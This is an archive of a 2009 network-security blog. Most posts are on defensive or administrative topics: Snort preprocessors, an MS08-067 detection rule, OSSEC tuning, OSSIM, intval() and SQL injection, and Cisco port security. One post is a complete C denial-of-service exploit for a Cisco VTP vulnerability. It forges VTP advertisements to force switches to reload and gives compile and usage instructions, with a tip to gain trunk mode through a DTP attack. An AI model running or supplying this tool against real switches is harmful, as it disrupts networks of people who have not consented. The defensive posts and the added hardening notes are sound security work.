Thursday, April 30, 2009

Thoughts on the secure use of PHP's intval() function

After reading an analysis of how improper use of PHP's built-in intval() function leads to security vulnerabilities:

My feeling is that in the usual case intval() is used to filter user-submitted data, stripping non-numeric characters to prevent SQL injection. Very few programs use it in an if check, and in the if-check case, whether intval() is added or not makes no difference to any black-box test result, so it cannot be extended any further.
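As an added illustration (not code from the original post), the snippet below shows what intval() actually returns for typical user-supplied strings, and then contrasts the two usages the post distinguishes: intval() used only inside an if check while the raw string still reaches the query, versus the converted integer (or a bound parameter) being the only thing the query sees. The function names, the `users` table and the mysqli handle are hypothetical.

```php
<?php
// Added example, not from the original post. Names below are hypothetical.

// 1. What intval() produces for strings a user might send. Leading digits are
//    kept, everything from the first non-digit on is dropped, and a string
//    that does not start with a digit becomes 0.
$samples = ['42', ' 42', '42abc', 'abc', '-7', '0x1A', '1e3', '99999999999999999999'];
foreach ($samples as $s) {
    printf("intval(%-22s) = %s\n", var_export($s, true), var_export(intval($s), true));
}
// '42abc' -> 42, 'abc' -> 0, '0x1A' -> 0 (hex is not parsed in base 10),
// '1e3' -> 1000 on PHP >= 7.1 (1 on older releases),
// '99999999999999999999' saturates to PHP_INT_MAX.

// 2. intval() as a mere if check: the test passes whenever the string starts
//    with digits, but the untouched string $rawId is what lands in the SQL,
//    so the check adds nothing to the query's safety.
function loadUserUnsafe(mysqli $db, string $rawId): ?array
{
    if (intval($rawId) > 0) {
        $res = $db->query("SELECT id, name FROM users WHERE id = $rawId");
        return $res ? ($res->fetch_assoc() ?: null) : null;
    }
    return null;
}

// 3. The filtering usage: the converted integer is the only value that reaches
//    the query, so trailing text is discarded rather than interpreted. Binding
//    it as a typed parameter removes even the string interpolation.
//    (get_result() requires the mysqlnd driver.)
function loadUserSafe(mysqli $db, string $rawId): ?array
{
    $id = intval($rawId);
    if ($id <= 0) {
        return null;                      // reject 0 (non-numeric input) and negatives
    }
    $stmt = $db->prepare('SELECT id, name FROM users WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}
```

The first loop runs on its own; the two functions need a live mysqli connection. The point of the contrast is that intval() protects the query only when its return value replaces the input, never when it is used purely as a predicate.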

Thursday, April 9, 2009

How to install a 64-bit operating system in VMware on a Windows XP (32-bit) host

Because the ossim-1.2 ISO only supports 64-bit, some problems came up while installing it in VMware. The solution is as follows:

1. First, confirm that the CPU is supported.
www.vmware.com/info?id=152 explains this fairly clearly: an AMD64 CPU must be revision D or later, and an Intel CPU needs EM64T and VT support. CPU-Z showed that my T7500 supports EM64T, which brings us to step 2.
2. Enable VT support
In the BIOS settings, find the VT switch and set it to Enabled. Then, importantly, the host must be "cold booted", i.e. started by pressing the power button, for the setting to take effect.


Thursday, April 2, 2009

What is a Snort Preprocessor?

Preprocessors are pluggable components of Snort, introduced in version 1.5. They are "located" just after the protocol-analysis module and before the detection engine, and they do not depend on rules. They are called whenever a packet arrives, but only ONCE; detection plugins, on the other hand, do depend on rules and may be applied many times to a single packet. SPPs (Snort preprocessors) can be used in different ways: they can look for a specific behaviour (portscan, flow-portscan), provide support for further analysis like flow, or just collect certain information, like perfmonitor.

Monday, March 30, 2009

A tip on cooking OSSEC rules

How to configure OSSEC rules to ignore something?
I have logs like this:

Mar 30 17:50:20 192.168.x.201 192.168.xx.104 - - [30/Mar/2009:17:50:43 +0800] "OPTIONS /svn HTTP/1.1" 401 401
Mar 30 17:50:21 192.168.x.201 192.168.xx.104 - root [30/Mar/2009:17:50:44 +0800] "OPTIONS /svn HTTP/1.1" 401 401
Mar 30 17:50:22 192.168.x.201 192.168.xx.104 - svn [30/Mar/2009:17:50:45 +0800] "OPTIONS /svn HTTP/1.1" 401 401
Mar 30 17:50:24 192.168.x.201 192.168.xx.104 - user [30/Mar/2009:17:50:46 +0800] "OPTIONS /svn HTTP/1.1" 401 401

I just want an alert when somebody makes 4xx errors in a short time, but I want to ignore the "-" in the user field.

First, I add the user field in etc/decoder.xml (decoder type web-log): the second \S+ of the stock access-log regex becomes a capture group, and "user" is added to the order.

<type>web-log</type>
<prematch>^\d+.\d+.\d+.\d+ </prematch>
<regex>^(\d+.\d+.\d+.\d+) \S+ (\S+) [\S+ \S\d+] "\w+ (\S+) HTTP\S+ (\d+) </regex>
<order>srcip, user, url, id</order>

Then add two new rules: one that matches <if_sid>31101</if_sid> with <user>^-</user>, and rule 31166, which matches <if_matched_sid>31101</if_matched_sid> with the description "Multiple web server 4XX error code. from same source ip.", the option alert_by_email and the group attack.

You can ignore the lines whose user field is "-" by giving that first rule level="0" and placing it in front of rule 31166.
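As an added example that is not part of the original post, here is the decoder and both rules written out in full. The decoder name web-accesslog is OSSEC's stock decoder of type web-log, which the post's regex extends; 31101 is the stock "Web server 400 error code" rule and 31166 is the id the post uses. The ignore rule's id 100101, the frequency of 10 hits and the timeframe of 120 seconds are assumptions the post does not state.

```xml
<!-- Added example, not the post's own files. Assumed values are marked. -->

<!-- etc/decoder.xml: stock web-accesslog decoder with the HTTP auth user captured -->
<decoder name="web-accesslog">
  <type>web-log</type>
  <prematch>^\d+.\d+.\d+.\d+ </prematch>
  <!-- srcip, then "-" (ident), then the user, then the bracketed timestamp -->
  <regex>^(\d+.\d+.\d+.\d+) \S+ (\S+) [\S+ \S\d+] </regex>
  <!-- method, url, protocol, status code -->
  <regex>"\w+ (\S+) HTTP\S+ (\d+) </regex>
  <order>srcip, user, url, id</order>
</decoder>

<!-- local rules file -->
<group name="web,accesslog,">

  <!-- Ignore rule (id 100101 is assumed; ids from 100000 up are the customary
       local range). Level 0 means the event is dropped: no alert, and it is not
       stored, so it cannot feed the frequency rule below. Kept ahead of 31166,
       as the post does. -->
  <rule id="100101" level="0">
    <if_sid>31101</if_sid>
    <user>^-</user>
    <description>Web 4xx error with no user name, ignored.</description>
  </rule>

  <!-- The remaining 31101 hits, i.e. those carrying a user name, are counted.
       frequency/timeframe are assumed: 10 hits from one source in 120 s. -->
  <rule id="31166" level="10" frequency="10" timeframe="120">
    <if_matched_sid>31101</if_matched_sid>
    <same_source_ip />
    <description>Multiple web server 4XX error code. from same source ip.</description>
    <options>alert_by_email</options>
    <group>attack,</group>
  </rule>

</group>
```

With the four sample lines above, the first one ("- -") is swallowed by rule 100101, while the root, svn and user lines each count toward rule 31166; tune frequency and timeframe to what "a short time" means on the monitored server.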

Sunday, March 29, 2009

The frag3 preprocessor in Snort

Why is the frag3 preprocessor needed?
The frag3 preprocessor performs target-based analysis.
The term "target-based" refers to an intelligent IDS that is informed about the hosts residing on the network and is capable of analyzing traffic sent to those hosts in the same way the host itself analyzes the traffic.
This improves the accuracy of the IDS.

for example:


How to use the frag3 preprocessor in snort.conf?

Like this:
preprocessor frag3_engine: policy first, bind_to 10.4.10.0/24

Now any overlapping fragments that Snort sees destined for subnet 10.4.1.x are reassembled using the "first" fragmentation policy, so that Snort reassembles fragments destined to those hosts in precisely the same way as the Windows hosts themselves.
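An added snort.conf fragment (not from the post) showing a frag3 section that actually loads: a frag3_engine line is only accepted after a frag3_global line, several engines may be bound to different address sets, and an engine without bind_to acts as the default for every other host. The address ranges here are constructed for illustration.

```text
# Added example, not the post's own config. Addresses are constructed.
# frag3_global must come first; it owns the fragment memory for all engines.
preprocessor frag3_global: max_frags 65536, memcap 4194304

# Hosts known to be Windows: "first" policy, so overlaps are resolved the way
# the Windows stack resolves them. detect_anomalies raises alerts on overlaps.
preprocessor frag3_engine: policy first, bind_to 10.4.10.0/24, detect_anomalies

# A couple of Linux servers, listed explicitly.
preprocessor frag3_engine: policy linux, bind_to [10.1.1.12, 10.1.1.13], detect_anomalies

# Catch-all engine for every host not claimed above.
preprocessor frag3_engine: policy bsd, detect_anomalies
```

If the bind_to range does not actually cover the hosts you mean, those hosts silently fall through to the catch-all engine, so check the ranges against the host inventory rather than against the example.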

Friday, March 27, 2009

snort rule for MS08-067

alert tcp any any -> any 445 (msg:"MS08067 RPC exploit"; content:"|2e 00 5c 00 5c|";offset:140; content:"|00 5c 00 2e 00 2e 00 5c 00 2e 00 2e 00 5c 00|"; within:20;metadata:service RPC; classtype:bad-unknown; sid:9000015; rev:1;)




it works!

Tuesday, March 17, 2009

What's the matter with "ossimframework.OssimDB : Error executing query (INSERT INTO event_stats...."?

OSSIM version 1.0.6 has a bug: it does not create the snort.event_stats table, which causes the Events -> Event Stats page to display an error.

This problem is described in https://www.ossim.net/forum/index.php?t=msg&goto=1125&S=fa53755c1ecfa7a74cb39dc4c245919e&srch=%22Event+Stats%22#msg_1125

You can resolve it with:
mysql -uroot -p snort < snort.event_stats.sql

Friday, March 6, 2009

Apache index settings

DirectoryIndex index.html index.php

Between index.html and index.php you must use a 'space', not a comma.

Friday, February 27, 2009

How to bind a MAC address to a Cisco switch port

Under the interface:
switchport port-security
switchport port-security violation restrict
switchport port-security mac-address 1111.1111.1111

The "restrict" mode is recommended.
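As an added example (not the post's own config), the same three lines in context: IOS refuses port-security on a port still in dynamic (DTP) mode, so the access-mode line comes first, and the three violation modes are contrasted so the choice of "restrict" is visible. The interface name and MAC address are constructed.

```text
! Added example, not from the post. Interface and MAC are constructed.
interface FastEthernet0/1
 switchport mode access
 switchport port-security
 switchport port-security maximum 1
 switchport port-security violation restrict
 switchport port-security mac-address 1111.1111.1111
!
! Violation modes, for comparison:
!   protect  - frames from other MACs are dropped silently: no counter, no log
!   restrict - dropped, and the violation counter, a syslog message and an
!              SNMP trap record it; the port stays up (the post's choice)
!   shutdown - default; the port goes err-disabled and needs errdisable
!              recovery or a manual shut / no shut
!
! Verify:
!   show port-security interface FastEthernet0/1
!   show port-security address
```

"restrict" keeps the evidence (the counter and the log line feed into monitoring) without turning a single misplugged laptop into an outage, which is the practical reason it is preferred over "shutdown" on user ports.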

Wednesday, January 14, 2009

DoS code for Cisco VLAN Trunking Protocol Vulnerability

/* DoS code for Cisco VLAN Trunking Protocol Vulnerability
 *
 * vulnerability description:
 * http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
 *
 * Notes:
 *  1. the switch must be in Server/Client mode.
 *  2. the port the attacker is connected to must be in trunk mode.
 *     Cisco Ethernet ports with no configuration are not in trunk mode,
 *     but trunk mode can be obtained through a DTP attack with Yersinia.
 *  3. you must know the VTP domain; this can be sniffed.
 *  4. some code is from Yersinia.
 *
 * Result:
 *  switch reload.
 *
 * Compile:
 *  gcc -o vtp `libnet-config --libs` vtp.c
 *
 * Usage: vtp -i -d
 *
 * Contact: showrun.lee[AT]gmail.com
 * http://sh0wrun.blogspot.com/
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <libnet.h>

#define VTP_DOMAIN_SIZE    32
#define VTP_TIMESTAMP_SIZE 12

/* VTP summary advertisement body (follows the 5-byte SNAP OUI/PID header) */
struct vtp_summary {
    u_int8_t  version;
    u_int8_t  code;
    u_int8_t  followers;
    u_int8_t  dom_len;
    u_int8_t  domain[VTP_DOMAIN_SIZE];
    u_int32_t revision;
    u_int32_t updater;
    u_int8_t  timestamp[VTP_TIMESTAMP_SIZE];
    u_int8_t  md5[16];
};

/* VTP subset advertisement body */
struct vtp_subset {
    u_int8_t  version;
    u_int8_t  code;
    u_int8_t  seq;
    u_int8_t  dom_len;
    u_int8_t  domain[VTP_DOMAIN_SIZE];
    u_int32_t revision;
};

void usage(char *s)
{
    printf("%s -i -d \n", s);
    exit(1);
}

int main(int argc, char *argv[])
{
    int opt, k = 0;
    int sent;
    libnet_ptag_t t;
    libnet_t *lhandler;
    u_int32_t vtp_len = 0;
    struct vtp_summary *vtp_summ;
    struct vtp_subset *vtp_sub;
    u_int8_t *vtp_packet, *vtp_packet2, *aux;
    u_int8_t cisco_data[] = { 0x00, 0x00, 0x0c, 0x20, 0x03 };       /* Cisco OUI + VTP PID */
    u_int8_t dst_mac[6]   = { 0x01, 0x00, 0x0c, 0xcc, 0xcc, 0xcc }; /* Cisco multicast */
    u_int8_t aaa[8]       = { 0x22, 0x00, 0x11, 0x22, 0x11, 0x00, 0x00, 0x00 }; /* unused */
    struct libnet_ether_addr *mymac;
    char *device = NULL;
    char error_information[LIBNET_ERRBUF_SIZE];
    char *domain = NULL;

    // get options
    while ((opt = getopt(argc, argv, "i:d:")) != -1) {
        switch (opt) {
        case 'i':
            device = malloc(strlen(optarg) + 1);   /* +1 for the terminating NUL */
            strcpy(device, optarg);
            k = 1;
            break;

        case 'd':
            domain = malloc(strlen(optarg) + 1);   /* +1 for the terminating NUL */
            strcpy(domain, optarg);
            break;

        default:
            usage(argv[0]);
        }
    }
    if (!k) {
        printf(" %s -i -d \n must assign the interface\n", argv[0]);
        exit(1);
    }
    if (!domain) {
        printf(" %s -i -d \n must assign the vtp domain\n", argv[0]);
        exit(1);
    }
    /* the domain field is a fixed 32 bytes; a longer name would overrun it */
    if (strlen(domain) > VTP_DOMAIN_SIZE) {
        printf("domain name longer than %d bytes\n", VTP_DOMAIN_SIZE);
        exit(1);
    }

    // init libnet
    lhandler = libnet_init(LIBNET_LINK, device, error_information);
    if (!lhandler) {
        fprintf(stderr, "libnet_init: %s\n", error_information);
        return -1;
    }

    mymac = libnet_get_hwaddr(lhandler);

    // build the first packet for vtp_summary
    vtp_len = sizeof(cisco_data) + sizeof(struct vtp_summary);
    vtp_packet = calloc(1, vtp_len);
    aux = vtp_packet;
    memcpy(vtp_packet, cisco_data, sizeof(cisco_data));
    aux += sizeof(cisco_data);
    vtp_summ = (struct vtp_summary *)aux;
    vtp_summ->version   = 0x01;
    vtp_summ->code      = 0x01;           // vtp_summary
    vtp_summ->followers = 0x01;
    vtp_summ->dom_len   = strlen(domain);
    memcpy(vtp_summ->domain, domain, strlen(domain));
    vtp_summ->revision  = htonl(2000);    // bigger than the current revision number will do

    t = libnet_build_802_2(
        0xaa,                       /* DSAP */
        0xaa,                       /* SSAP */
        0x03,                       /* control */
        vtp_packet,                 /* payload */
        vtp_len,                    /* payload size */
        lhandler,                   /* libnet handle */
        0);                         /* libnet id */
    t = libnet_build_802_3(
        dst_mac,                    /* ethernet destination */
        mymac->ether_addr_octet,    /* ethernet source */
        LIBNET_802_2_H + vtp_len,   /* frame size */
        NULL,                       /* payload */
        0,                          /* payload size */
        lhandler,                   /* libnet handle */
        0);                         /* libnet id */

    sent = libnet_write(lhandler);
    if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
    }
    libnet_clear_packet(lhandler);

    // build the second vtp packet for vtp_subset
    vtp_len = sizeof(cisco_data) + sizeof(struct vtp_subset);
    vtp_packet2 = calloc(1, vtp_len);
    aux = vtp_packet2;
    memcpy(vtp_packet2, cisco_data, sizeof(cisco_data));
    aux += sizeof(cisco_data);

    vtp_sub = (struct vtp_subset *)aux;
    vtp_sub->version  = 0x01;
    vtp_sub->code     = 0x02;             // vtp_subset
    vtp_sub->seq      = 0x01;
    vtp_sub->dom_len  = strlen(domain);
    memcpy(vtp_sub->domain, domain, strlen(domain));
    vtp_sub->revision = htonl(2000);      // bigger than the current revision number will do
    // memcpy(vtp_sub->aaa, aaa, strlen(aaa));

    t = libnet_build_802_2(
        0xaa,                       /* DSAP */
        0xaa,                       /* SSAP */
        0x03,                       /* control */
        vtp_packet2,                /* payload */
        vtp_len,                    /* payload size */
        lhandler,                   /* libnet handle */
        0);                         /* libnet id */
    t = libnet_build_802_3(
        dst_mac,                    /* ethernet destination */
        mymac->ether_addr_octet,    /* ethernet source */
        LIBNET_802_2_H + vtp_len,   /* frame size */
        NULL,                       /* payload */
        0,                          /* payload size */
        lhandler,                   /* libnet handle */
        0);                         /* libnet id */

    sent = libnet_write(lhandler);
    if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        free(vtp_packet2);          /* the original freed vtp_packet twice here */
        return -1;
    }
    libnet_clear_packet(lhandler);

    free(vtp_packet);
    free(vtp_packet2);
    libnet_destroy(lhandler);
    return 0;
}
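From the defender's side, as an added example that is not part of the post, the two preconditions listed in the header comment (a VTP server/client switch, and an attacker port that was talked into trunk mode over DTP) each map onto one switch setting. The interface range is constructed.

```text
! Added example, not from the post. Interface range is constructed.
!
! Precondition 2: the attacker's port must become a trunk via DTP.
! Pin user-facing ports to access mode and stop them negotiating at all.
interface range FastEthernet0/1 - 24
 switchport mode access
 switchport nonegotiate
!
! Precondition 1: the switch must be a VTP server or client.
! A switch that does not need VTP should run transparent: it still forwards
! VTP frames to its neighbours but never applies advertisements to its own
! VLAN database.
vtp mode transparent
!
! Verify:
!   show vtp status            -> "VTP Operating Mode : Transparent"
!   show interfaces switchport -> "Negotiation of Trunking: Off" on user ports
```

On switches that do need VTP, the access-port lines still remove the DTP path; keep the number of server/client switches to the minimum the VLAN design requires, and watch "show vtp status" for unexpected jumps in the configuration revision, which is exactly what the revision field above is set high to exploit.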

Tuesday, January 6, 2009

"Repeater mode" in DD-WRT

If you want to repeat the network from another AP, you can set Wireless -> Basic Settings -> "Wireless Physical Interface" to "Client", "Client Bridge", "Repeater" or "Repeater Bridge"; the differences between these can be looked up. What I want to say is that above all you must set Setup -> Basic Setup -> WAN Connection Type -> Connection Type to "DHCP", because without this DD-WRT cannot acquire an IP address from the other AP that you want to repeat.

Sunday, January 4, 2009

Using monit on Debian to restart programs automatically

Debian uses monit to monitor running programs, and it can restart them automatically.

Alternatively, the respawn option in /etc/inittab can also be used to keep a program running.

watchdog's goal is to monitor the state of the whole system and reboot the operating system when something goes wrong; it is not suited to monitoring process state.
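As an added example (not configuration from the post), a monit check for one daemon next to the inittab equivalent, so the difference between the two approaches is concrete. sshd is used as the daemon, and the pidfile and init script paths are the usual Debian ones, but which daemon you monitor and where its files live are assumptions.

```text
# Added example, not from the post. Daemon and paths are assumed.
# /etc/monit/conf.d/sshd  (monit syntax)
set daemon 60                                   # poll every 60 seconds

check process sshd with pidfile /var/run/sshd.pid
  start program = "/etc/init.d/ssh start"
  stop  program = "/etc/init.d/ssh stop"
  # a pid alone is not health: also talk to the service and restart if it
  # does not answer with an SSH banner
  if failed port 22 protocol ssh then restart
  # a daemon that dies immediately after every restart is a bug, not a blip;
  # stop looping and leave an alert instead
  if 5 restarts within 5 cycles then timeout

# /etc/inittab equivalent (sysvinit). init re-spawns the process as soon as it
# exits, but only checks that the pid exists, never that the service answers.
# The daemon must stay in the foreground (-D) or init sees it exit at once.
#   id:runlevels:action:process
#   sd:2345:respawn:/usr/sbin/sshd -D
```

Use one mechanism per daemon, not both: with an inittab respawn entry and a monit check on the same process, each will fight the other's restarts. The timeout clause is the piece worth keeping whatever the daemon; without it a crashing service is restarted forever and the failure never surfaces as an alert.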